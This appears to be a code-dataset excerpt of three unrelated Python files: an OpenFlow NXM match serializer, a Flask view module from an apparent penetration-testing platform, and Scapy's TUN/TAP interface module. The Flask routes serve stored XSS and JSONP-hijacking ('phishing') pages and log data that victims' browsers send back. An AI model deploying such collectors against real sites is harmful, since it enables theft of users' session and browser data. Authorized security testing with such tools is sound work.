self.n_bits = self.n_bytes * 8
@classmethod
def parser(cls, buf, offset):
(header,) = struct.unpack_from('!I', buf, offset)
cls_ = MFField._FIELDS_HEADERS.get(header)
if cls_:
field = cls_.field_parser(header, buf, offset)
else:
            raise ValueError('unknown field type: %s' % hex(header))
field.length = (header & 0xff) + 4
return field
@classmethod
def field_parser(cls, header, buf, offset):
hasmask = (header >> 8) & 1
mask = None
if hasmask:
pack_str = '!' + cls.pack_str[1:] * 2
(value, mask) = struct.unpack_from(pack_str, buf,
offset + 4)
else:
(value,) = struct.unpack_from(cls.pack_str, buf,
offset + 4)
return cls(header, value, mask)
def _put(self, buf, offset, value):
ofproto_parser.msg_pack_into(self.pack_str, buf, offset, value)
return self.n_bytes
def putw(self, buf, offset, value, mask):
len_ = self._put(buf, offset, value)
return len_ + self._put(buf, offset + len_, mask)
def _is_all_ones(self, value):
return value == (1 << self.n_bits) - 1
def putm(self, buf, offset, value, mask):
if mask == 0:
return 0
elif self._is_all_ones(mask):
return self._put(buf, offset, value)
else:
return self.putw(buf, offset, value, mask)
def _putv6(self, buf, offset, value):
ofproto_parser.msg_pack_into(self.pack_str, buf, offset,
*value)
return self.n_bytes
def putv6(self, buf, offset, value, mask):
len_ = self._putv6(buf, offset, value)
if len(mask):
return len_ + self._putv6(buf, offset + len_, mask)
return len_
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IN_PORT])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_IN_PORT])
class MFInPort(MFField):
pack_str = MF_PACK_STRING_BE16
def __init__(self, header, value, mask=None):
super(MFInPort, self).__init__(header, MFInPort.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFInPort.pack_str)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.in_port)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ETH_DST, ofproto_v1_0.NXM_OF_ETH_DST_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_ETH_DST,
ofproto_v1_0.NXM_OF_ETH_DST_W])
class MFEthDst(MFField):
pack_str = MF_PACK_STRING_MAC
def __init__(self, header, value, mask=None):
super(MFEthDst, self).__init__(header, MFEthDst.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFEthDst.pack_str)
def put(self, buf, offset, rule):
if rule.wc.dl_dst_mask:
return self.putw(buf, offset, rule.flow.dl_dst,
rule.wc.dl_dst_mask)
else:
return self._put(buf, offset, rule.flow.dl_dst)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ETH_SRC, ofproto_v1_0.NXM_OF_ETH_SRC_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_ETH_SRC,
ofproto_v1_0.NXM_OF_ETH_SRC_W])
class MFEthSrc(MFField):
pack_str = MF_PACK_STRING_MAC
def __init__(self, header, value, mask=None):
super(MFEthSrc, self).__init__(header, MFEthSrc.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFEthSrc.pack_str)
def put(self, buf, offset, rule):
if rule.wc.dl_src_mask:
return self.putw(buf, offset, rule.flow.dl_src,
rule.wc.dl_src_mask)
else:
return self._put(buf, offset, rule.flow.dl_src)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ETH_TYPE])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_ETH_TYPE])
class MFEthType(MFField):
pack_str = MF_PACK_STRING_BE16
def __init__(self, header, value, mask=None):
super(MFEthType, self).__init__(header, MFEthType.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFEthType.pack_str)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.dl_type)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_VLAN_TCI,
ofproto_v1_0.NXM_OF_VLAN_TCI_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_VLAN_TCI,
ofproto_v1_0.NXM_OF_VLAN_TCI_W])
class MFVlan(MFField):
pack_str = MF_PACK_STRING_BE16
def __init__(self, header, value, mask=None):
super(MFVlan, self).__init__(header, MFVlan.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFVlan.pack_str)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.vlan_tci,
rule.wc.vlan_tci_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IP_TOS])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_IP_TOS])
class MFIPDSCP(MFField):
pack_str = MF_PACK_STRING_8
def __init__(self, header, value, mask=None):
super(MFIPDSCP, self).__init__(header, MFIPDSCP.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFIPDSCP.pack_str)
def put(self, buf, offset, rule):
return self._put(buf, offset,
rule.flow.nw_tos & IP_DSCP_MASK)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_TUN_ID,
ofproto_v1_0.NXM_NX_TUN_ID_W])
@MFField.register_field_header([ofproto_v1_0.NXM_NX_TUN_ID,
ofproto_v1_0.NXM_NX_TUN_ID_W])
class MFTunId(MFField):
pack_str = MF_PACK_STRING_BE64
def __init__(self, header, value, mask=None):
super(MFTunId, self).__init__(header, MFTunId.pack_str)
self.value = value
@classmethod
def make(cls, header):
return cls(header, MFTunId.pack_str)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.tun_id, rule.wc.tun_id_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IP_SRC, ofproto_v1_0.NXM_OF_IP_SRC_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_IP_SRC,
ofproto_v1_0.NXM_OF_IP_SRC_W])
class MFIPSrc(MFField):
pack_str = MF_PACK_STRING_BE32
def __init__(self, header, value, mask=None):
super(MFIPSrc, self).__init__(header, MFIPSrc.pack_str)
self.value = value
self.mask = mask
@classmethod
def make(cls, header):
return cls(header, MFIPSrc.pack_str)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.nw_src, rule.wc.nw_src_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IP_DST, ofproto_v1_0.NXM_OF_IP_DST_W])
@MFField.register_field_header([ofproto_v1_0.NXM_OF_IP_DST,
ofproto_v1_0.NXM_OF_IP_DST_W])
class MFIPDst(MFField):
pack_str = MF_PACK_STRING_BE32
def __init__(self, header, value, mask=None):
super(MFIPDst, self).__init__(header, MFIPDst.pack_str)
self.value = value
self.mask = mask
@classmethod
def make(cls, header):
return cls(header, MFIPDst.pack_str)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.nw_dst, rule.wc.nw_dst_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IP_ECN])
class MFIPECN(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset,
rule.flow.nw_tos & IP_ECN_MASK)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IP_TTL])
class MFIPTTL(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.nw_ttl)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_IP_PROTO])
class MFIPProto(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.nw_proto)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_TCP_SRC, ofproto_v1_0.NXM_OF_TCP_SRC_W,
ofproto_v1_0.NXM_OF_UDP_SRC, ofproto_v1_0.NXM_OF_UDP_SRC_W])
class MFTPSRC(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE16)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.tp_src, rule.wc.tp_src_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_TCP_DST, ofproto_v1_0.NXM_OF_TCP_DST_W,
ofproto_v1_0.NXM_OF_UDP_DST, ofproto_v1_0.NXM_OF_UDP_DST_W])
class MFTPDST(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE16)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.tp_dst, rule.wc.tp_dst_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ARP_SPA, ofproto_v1_0.NXM_OF_ARP_SPA_W])
class MFArpSpa(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE32)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.arp_spa, rule.wc.arp_spa_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ARP_TPA, ofproto_v1_0.NXM_OF_ARP_TPA_W])
class MFArpTpa(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE32)
def put(self, buf, offset, rule):
return self.putm(buf, offset, rule.flow.arp_tpa, rule.wc.arp_tpa_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ARP_SHA])
class MFArpSha(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_MAC)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.arp_sha)
class MFIPV6(object):
pack_str = MF_PACK_STRING_IPV6
@classmethod
def field_parser(cls, header, buf, offset):
hasmask = (header >> 8) & 1
if hasmask:
pack_string = '!' + cls.pack_str[1:] * 2
value = struct.unpack_from(pack_string, buf, offset + 4)
return cls(header, list(value[:8]), list(value[8:]))
else:
value = struct.unpack_from(cls.pack_str, buf, offset + 4)
return cls(header, list(value))
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IPV6_SRC,
ofproto_v1_0.NXM_NX_IPV6_SRC_W])
@MFField.register_field_header([ofproto_v1_0.NXM_NX_IPV6_SRC,
ofproto_v1_0.NXM_NX_IPV6_SRC_W])
class MFIPV6Src(MFIPV6, MFField):
def __init__(self, header, value, mask=None):
super(MFIPV6Src, self).__init__(header, MFIPV6Src.pack_str)
self.value = value
self.mask = mask
@classmethod
def make(cls, header):
return cls(header, cls.pack_str)
def put(self, buf, offset, rule):
return self.putv6(buf, offset,
rule.flow.ipv6_src,
rule.wc.ipv6_src_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IPV6_DST,
ofproto_v1_0.NXM_NX_IPV6_DST_W])
@MFField.register_field_header([ofproto_v1_0.NXM_NX_IPV6_DST,
ofproto_v1_0.NXM_NX_IPV6_DST_W])
class MFIPV6Dst(MFIPV6, MFField):
def __init__(self, header, value, mask=None):
super(MFIPV6Dst, self).__init__(header, MFIPV6Dst.pack_str)
self.value = value
self.mask = mask
@classmethod
def make(cls, header):
return cls(header, cls.pack_str)
def put(self, buf, offset, rule):
return self.putv6(buf, offset,
rule.flow.ipv6_dst,
rule.wc.ipv6_dst_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ND_TARGET,
ofproto_v1_0.NXM_NX_ND_TARGET_W])
class MFNdTarget(MFField):
@classmethod
def make(cls, header):
return cls(header, '!4I')
def put(self, buf, offset, rule):
return self.putv6(buf, offset,
rule.flow.nd_target,
rule.wc.nd_target_mask)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IP_FRAG,
ofproto_v1_0.NXM_NX_IP_FRAG_W])
class MFIpFrag(MFField):
@classmethod
def make(cls, header):
return cls(header, '!B')
def put(self, buf, offset, rule):
if rule.wc.nw_frag_mask == FLOW_NW_FRAG_MASK:
return self._put(buf, offset, rule.flow.nw_frag)
else:
return self.putw(buf, offset, rule.flow.nw_frag,
rule.wc.nw_frag_mask & FLOW_NW_FRAG_MASK)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ARP_THA])
class MFArpTha(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_MAC)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.arp_tha)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ICMP_TYPE])
class MFICMPType(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.tp_src)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_OF_ICMP_CODE])
class MFICMPCode(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.tp_dst)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ICMPV6_TYPE])
class MFICMPV6Type(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.tp_src)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_ICMPV6_CODE])
class MFICMPV6Code(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_8)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.tp_dst)
@_register_make
@_set_nxm_headers([ofproto_v1_0.NXM_NX_IPV6_LABEL])
class MFICMPV6Label(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE32)
def put(self, buf, offset, rule):
return self._put(buf, offset, rule.flow.ipv6_label)
@_register_make
@_set_nxm_headers([ofproto_v1_0.nxm_nx_reg(i) for i in range(FLOW_N_REGS)]
+ [ofproto_v1_0.nxm_nx_reg_w(i) for i in range(FLOW_N_REGS)])
class MFRegister(MFField):
@classmethod
def make(cls, header):
return cls(header, MF_PACK_STRING_BE32)
def put(self, buf, offset, rule):
for i in range(FLOW_N_REGS):
if (ofproto_v1_0.nxm_nx_reg(i) == self.nxm_header or
ofproto_v1_0.nxm_nx_reg_w(i) == self.nxm_header):
if rule.wc.regs_mask[i]:
return self.putm(buf, offset, rule.flow.regs[i],
rule.wc.regs_mask[i])
else:
return self._put(buf, offset, rule.flow.regs[i])
def serialize_nxm_match(rule, buf, offset):
old_offset = offset
if not rule.wc.wildcards & FWW_IN_PORT:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_IN_PORT, rule)
# Ethernet.
if rule.flow.dl_dst != mac.DONTCARE:
if rule.wc.dl_dst_mask:
header = ofproto_v1_0.NXM_OF_ETH_DST_W
else:
header = ofproto_v1_0.NXM_OF_ETH_DST
offset += nxm_put(buf, offset, header, rule)
if rule.flow.dl_src != mac.DONTCARE:
if rule.wc.dl_src_mask:
header = ofproto_v1_0.NXM_OF_ETH_SRC_W
else:
header = ofproto_v1_0.NXM_OF_ETH_SRC
offset += nxm_put(buf, offset, header, rule)
if not rule.wc.wildcards & FWW_DL_TYPE:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_ETH_TYPE, rule)
# 802.1Q
if rule.wc.vlan_tci_mask != 0:
if rule.wc.vlan_tci_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_VLAN_TCI
else:
header = ofproto_v1_0.NXM_OF_VLAN_TCI_W
offset += nxm_put(buf, offset, header, rule)
# L3
if not rule.wc.wildcards & FWW_NW_DSCP:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_IP_TOS, rule)
if not rule.wc.wildcards & FWW_NW_ECN:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_IP_ECN, rule)
if not rule.wc.wildcards & FWW_NW_TTL:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_IP_TTL, rule)
if not rule.wc.wildcards & FWW_NW_PROTO:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_IP_PROTO, rule)
if not rule.wc.wildcards & FWW_NW_PROTO and (rule.flow.nw_proto
== inet.IPPROTO_ICMP):
if rule.wc.tp_src_mask != 0:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_ICMP_TYPE, rule)
if rule.wc.tp_dst_mask != 0:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_OF_ICMP_CODE, rule)
if rule.flow.tp_src != 0:
if rule.flow.nw_proto == 6:
if rule.wc.tp_src_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_TCP_SRC
else:
header = ofproto_v1_0.NXM_OF_TCP_SRC_W
elif rule.flow.nw_proto == 17:
if rule.wc.tp_src_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_UDP_SRC
else:
header = ofproto_v1_0.NXM_OF_UDP_SRC_W
else:
header = 0
if header != 0:
offset += nxm_put(buf, offset, header, rule)
if rule.flow.tp_dst != 0:
if rule.flow.nw_proto == 6:
if rule.wc.tp_dst_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_TCP_DST
else:
header = ofproto_v1_0.NXM_OF_TCP_DST_W
elif rule.flow.nw_proto == 17:
if rule.wc.tp_dst_mask == UINT16_MAX:
header = ofproto_v1_0.NXM_OF_UDP_DST
else:
header = ofproto_v1_0.NXM_OF_UDP_DST_W
else:
header = 0
if header != 0:
offset += nxm_put(buf, offset, header, rule)
# IP Source and Destination
if rule.flow.nw_src != 0:
if rule.wc.nw_src_mask == UINT32_MAX:
header = ofproto_v1_0.NXM_OF_IP_SRC
else:
header = ofproto_v1_0.NXM_OF_IP_SRC_W
offset += nxm_put(buf, offset, header, rule)
if rule.flow.nw_dst != 0:
if rule.wc.nw_dst_mask == UINT32_MAX:
header = ofproto_v1_0.NXM_OF_IP_DST
else:
header = ofproto_v1_0.NXM_OF_IP_DST_W
offset += nxm_put(buf, offset, header, rule)
# IPv6
if not rule.wc.wildcards & FWW_NW_PROTO and (rule.flow.nw_proto
== inet.IPPROTO_ICMPV6):
if rule.wc.tp_src_mask != 0:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_ICMPV6_TYPE,
rule)
if rule.wc.tp_dst_mask != 0:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_ICMPV6_CODE,
rule)
if not rule.wc.wildcards & FWW_IPV6_LABEL:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_IPV6_LABEL, rule)
if len(rule.flow.ipv6_src):
if len(rule.wc.ipv6_src_mask):
header = ofproto_v1_0.NXM_NX_IPV6_SRC_W
else:
header = ofproto_v1_0.NXM_NX_IPV6_SRC
offset += nxm_put(buf, offset, header, rule)
if len(rule.flow.ipv6_dst):
if len(rule.wc.ipv6_dst_mask):
header = ofproto_v1_0.NXM_NX_IPV6_DST_W
else:
header = ofproto_v1_0.NXM_NX_IPV6_DST
offset += nxm_put(buf, offset, header, rule)
if len(rule.flow.nd_target):
if len(rule.wc.nd_target_mask):
header = ofproto_v1_0.NXM_NX_ND_TARGET_W
else:
header = ofproto_v1_0.NXM_NX_ND_TARGET
offset += nxm_put(buf, offset, header, rule)
# ARP
if rule.flow.arp_spa != 0:
if rule.wc.arp_spa_mask == UINT32_MAX:
header = ofproto_v1_0.NXM_OF_ARP_SPA
else:
header = ofproto_v1_0.NXM_OF_ARP_SPA_W
offset += nxm_put(buf, offset, header, rule)
if rule.flow.arp_tpa != 0:
if rule.wc.arp_tpa_mask == UINT32_MAX:
header = ofproto_v1_0.NXM_OF_ARP_TPA
else:
header = ofproto_v1_0.NXM_OF_ARP_TPA_W
offset += nxm_put(buf, offset, header, rule)
if not rule.wc.wildcards & FWW_ARP_SHA:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_ARP_SHA, rule)
if not rule.wc.wildcards & FWW_ARP_THA:
offset += nxm_put(buf, offset, ofproto_v1_0.NXM_NX_ARP_THA, rule)
if rule.flow.nw_frag:
if rule.wc.nw_frag_mask == FLOW_NW_FRAG_MASK:
header = ofproto_v1_0.NXM_NX_IP_FRAG
else:
header = ofproto_v1_0.NXM_NX_IP_FRAG_W
offset += nxm_put(buf, offset, header, rule)
# Tunnel Id
if rule.wc.tun_id_mask != 0:
if rule.wc.tun_id_mask == UINT64_MAX:
header = ofproto_v1_0.NXM_NX_TUN_ID
else:
header = ofproto_v1_0.NXM_NX_TUN_ID_W
offset += nxm_put(buf, offset, header, rule)
# XXX: Cookie
for i in range(FLOW_N_REGS):
if rule.wc.regs_bits & (1 << i):
if rule.wc.regs_mask[i]:
header = ofproto_v1_0.nxm_nx_reg_w(i)
else:
header = ofproto_v1_0.nxm_nx_reg(i)
offset += nxm_put(buf, offset, header, rule)
# Pad
pad_len = round_up(offset) - offset
ofproto_parser.msg_pack_into("%dx" % pad_len, buf, offset)
# The returned length, the match_len, does not include the pad
return offset - old_offset
def nxm_put(buf, offset, header, rule):
nxm = NXMatch(header)
len_ = nxm.put_header(buf, offset)
mf = mf_from_nxm_header(nxm.header)
return len_ + mf.put(buf, offset + len_, rule)
def round_up(length):
    return (length + 7) // 8 * 8 # Round up to a multiple of 8
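# For example, round_up(9) == 16 and round_up(16) == 16; serialize_nxm_match()
# above relies on this to pad the serialized match out to an 8-byte boundary
# (the padding itself is not counted in the returned match_len).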
class NXMatch(object):
def __init__(self, header):
self.header = header
@classmethod
def parser(cls, buf, offset, match_len):
if match_len < 4:
raise exception.OFPMalformedMessage
(header,) = struct.unpack_from(ofproto_v1_0.NXM_HEADER_PACK_STRING,
buf, offset)
instance = cls(header)
payload_len = instance.length()
if payload_len == 0 or match_len < payload_len + 4:
raise exception.OFPMalformedMessage
return instance
def vendor(self):
return self.header >> 16
def field(self):
        return (self.header >> 9) & 0x7f
def type(self):
        return (self.header >> 9) & 0x7fffff
def hasmask(self):
return (self.header >> 8) & 1
def length(self):
return self.header & 0xff
def show(self):
return ('%08x (vendor=%x, field=%x, hasmask=%x len=%x)' %
(self.header, self.vendor(), self.field(),
self.hasmask(), self.length()))
def put_header(self, buf, offset):
ofproto_parser.msg_pack_into(ofproto_v1_0.NXM_HEADER_PACK_STRING,
buf, offset, self.header)
return struct.calcsize(ofproto_v1_0.NXM_HEADER_PACK_STRING)
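# A small illustrative check of the header helpers above. The header value is
# assembled by hand (vendor=0, field=3, hasmask=0, length=2) rather than taken
# from a named NXM constant, so it only shows how the bit fields are unpacked:
#
#   m = NXMatch((0 << 16) | (3 << 9) | (0 << 8) | 2)
#   print(m.show())   # 00000602 (vendor=0, field=3, hasmask=0 len=2)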
|
fuxi/web/views/blue_view.py
|
cocobear/fuxi
| 731 |
67513
|
<filename>fuxi/web/views/blue_view.py<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 2019/1/21
# @File : blue_views.py
# @Desc : ""
from fuxi.web.flask_app import flask_app
from flask import jsonify
from flask import request, Blueprint, render_template
from fuxi.core.data.response import Response, StatusCode
from fuxi.common.utils.logger import logger
from fuxi.core.databases.orm.exploit.jsonp_orm import DBExploitJsonpTask
from fuxi.core.databases.orm.exploit.http_log_orm import DBHttpRequestLog
from fuxi.core.databases.orm.exploit.xss_orm import DBXssTasks, DBXssResult
blue_view = Blueprint('blue_views', __name__)
@blue_view.route('/')
def index():
return render_template('index.html')
@blue_view.route('/favicon.ico')
def favicon():
return ""
@flask_app.errorhandler(404)
def handle_404_error(e):
"""
:param e: 404 error msg
:return:
"""
if flask_app.config.get("DEBUG"):
return jsonify(Response.failed(StatusCode.NOT_FOUND, message=e))
else:
return jsonify(Response.failed(StatusCode.NOT_FOUND))
@flask_app.errorhandler(500)
def handle_all_error(e):
"""
:param e: unknown error msg
:return:
"""
if flask_app.config.get("DEBUG"):
return jsonify(Response.failed(StatusCode.SERVER_ERROR, message=e))
else:
return jsonify(Response.failed(StatusCode.SERVER_ERROR))
@blue_view.route('/jsonp/<sid>', methods=['GET'])
def phishing(sid):
try:
item = DBExploitJsonpTask.get_detail_by_short_id(sid)
if item:
return item['html']
else:
return "Not Found HTML"
except Exception as e:
logger.warning("get jsonp hijacking page failed: {} {}".format(sid, e))
return "Not Found HTML"
@blue_view.route('/http', methods=['GET'])
def http_log():
if request.method == 'GET':
try:
data = request.args.get("data", default=None)
verify = request.args.get("verify", default=None)
if data:
ip = request.remote_addr if request.remote_addr else '0.0.0.0'
referrer = request.referrer if request.referrer else '-'
hid = DBHttpRequestLog.add(ip, referrer, data)
return jsonify({"status": "success", "data": str(hid)})
elif verify:
if DBHttpRequestLog.verify(verify):
return jsonify({"result": True})
else:
return jsonify({"result": False})
else:
return jsonify({"status": "failed", "data": ""})
except Exception as e:
logger.warning("receive http request log failed: {}".format(e))
return jsonify({"status": "failed", "data": ""})
@blue_view.route('/x/<path>', methods=['GET'])
def get_xss_payload(path):
try:
project_item = DBXssTasks.get_detail_by_salt(path[:5])
if project_item:
return "{}".format(project_item['payload'])
else:
return "Not Found"
except Exception as e:
msg = "get xss payload: {}".format(e)
logger.warning(msg)
return Response.failed(message=msg)
@blue_view.route('/xss', methods=['GET'])
def get_xss_data():
try:
salt = request.args.get('salt')
data = request.args.get('data')
url = request.args.get('url')
client = request.remote_addr if request.remote_addr else '0.0.0.0'
referrer = request.referrer if request.referrer else '-'
extend = request.args.get('extend')
if salt:
item = DBXssTasks.get_detail_by_salt(salt)
if item:
DBXssResult.add(
item['_id'], salt, client=client, referrer=referrer,
url=url, data=data, extend=extend
)
return "Y"
else:
return "Missing Parameter: salt"
except Exception as e:
logger.warning("get xss data failed: {}".format(e))
return "x"
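# Client-side sketch of the /http logging endpoint above. The host and port are
# assumptions for a local development server; the view accepts either `data`
# (store a log entry) or `verify` (check that an entry exists):
#
#   import requests
#   requests.get("http://127.0.0.1:5000/http", params={"data": "test-payload"}).json()
#   # -> {"status": "success", "data": "<hid>"}
#   requests.get("http://127.0.0.1:5000/http", params={"verify": "<hid>"}).json()
#   # -> {"result": true} or {"result": false}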
|
scripts/external_libs/scapy-2.4.5/scapy/layers/tuntap.py
|
dariusgrassi/trex-core
| 250 |
67518
|
<filename>scripts/external_libs/scapy-2.4.5/scapy/layers/tuntap.py
# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) <NAME> <<EMAIL>>
# Copyright (C) <NAME> <<EMAIL>>
# This program is published under a GPLv2 license
"""
Implementation of TUN/TAP interfaces.
These allow Scapy to act as the remote side of a virtual network interface.
"""
from __future__ import absolute_import
import os
import socket
import time
from fcntl import ioctl
from scapy.compat import raw, bytes_encode
from scapy.config import conf
from scapy.consts import BIG_ENDIAN, BSD, LINUX
from scapy.data import ETHER_TYPES, MTU
from scapy.error import warning, log_runtime
from scapy.fields import Field, FlagsField, StrFixedLenField, XShortEnumField
from scapy.layers.inet import IP
from scapy.layers.inet6 import IPv46, IPv6
from scapy.layers.l2 import Ether
from scapy.packet import Packet
from scapy.supersocket import SimpleSocket
import scapy.modules.six as six
# Linux-specific defines (/usr/include/linux/if_tun.h)
LINUX_TUNSETIFF = 0x400454ca
LINUX_IFF_TUN = 0x0001
LINUX_IFF_TAP = 0x0002
LINUX_IFF_NO_PI = 0x1000
LINUX_IFNAMSIZ = 16
class NativeShortField(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "@H")
class TunPacketInfo(Packet):
aliastypes = [Ether]
class LinuxTunIfReq(Packet):
"""
Structure to request a specific device name for a tun/tap
Linux ``struct ifreq``.
See linux/if.h (struct ifreq) and tuntap.txt for reference.
"""
fields_desc = [
# union ifr_ifrn
StrFixedLenField("ifrn_name", b"", 16),
# union ifr_ifru
NativeShortField("ifru_flags", 0),
]
class LinuxTunPacketInfo(TunPacketInfo):
"""
Base for TUN packets.
See linux/if_tun.h (struct tun_pi) for reference.
"""
fields_desc = [
# This is native byte order
FlagsField("flags", 0,
(lambda _: 16 if BIG_ENDIAN else -16),
["TUN_VNET_HDR"] +
["reserved%d" % x for x in range(1, 16)]),
# This is always network byte order
XShortEnumField("type", 0x9000, ETHER_TYPES),
]
class TunTapInterface(SimpleSocket):
"""
A socket to act as the host's peer of a tun / tap interface.
This implements kernel interfaces for tun and tap devices.
:param iface: The name of the interface to use, eg: 'tun0'
:param mode_tun: If True, create as TUN interface (layer 3).
If False, creates a TAP interface (layer 2).
If not supplied, attempts to detect from the ``iface``
name.
:type mode_tun: bool
:param strip_packet_info: If True (default), strips any TunPacketInfo from
                              the packet. If False, leaves it intact. Some
operating systems and tunnel types don't include
this sort of data.
:type strip_packet_info: bool
FreeBSD references:
* tap(4): https://www.freebsd.org/cgi/man.cgi?query=tap&sektion=4
* tun(4): https://www.freebsd.org/cgi/man.cgi?query=tun&sektion=4
Linux references:
* https://www.kernel.org/doc/Documentation/networking/tuntap.txt
"""
desc = "Act as the host's peer of a tun / tap interface"
def __init__(self, iface=None, mode_tun=None, default_read_size=MTU,
strip_packet_info=True, *args, **kwargs):
self.iface = bytes_encode(conf.iface if iface is None else iface)
self.mode_tun = mode_tun
if self.mode_tun is None:
if self.iface.startswith(b"tun"):
self.mode_tun = True
elif self.iface.startswith(b"tap"):
self.mode_tun = False
else:
raise ValueError(
"Could not determine interface type for %r; set "
"`mode_tun` explicitly." % (self.iface,))
self.strip_packet_info = bool(strip_packet_info)
# This is non-zero when there is some kernel-specific packet info.
# We add this to any MTU value passed to recv(), and use it to
# remove leading bytes when strip_packet_info=True.
self.mtu_overhead = 0
# The TUN packet specification sends raw IP at us, and doesn't specify
# which version.
self.kernel_packet_class = IPv46 if self.mode_tun else Ether
if LINUX:
devname = b"/dev/net/tun"
# Having an EtherType always helps on Linux, then we don't need
# to use auto-detection of IP version.
if self.mode_tun:
self.kernel_packet_class = LinuxTunPacketInfo
self.mtu_overhead = 4 # len(LinuxTunPacketInfo)
else:
warning("tap devices on Linux do not include packet info!")
self.strip_packet_info = True
if len(self.iface) > LINUX_IFNAMSIZ:
warning("Linux interface names are limited to %d bytes, "
"truncating!" % (LINUX_IFNAMSIZ,))
self.iface = self.iface[:LINUX_IFNAMSIZ]
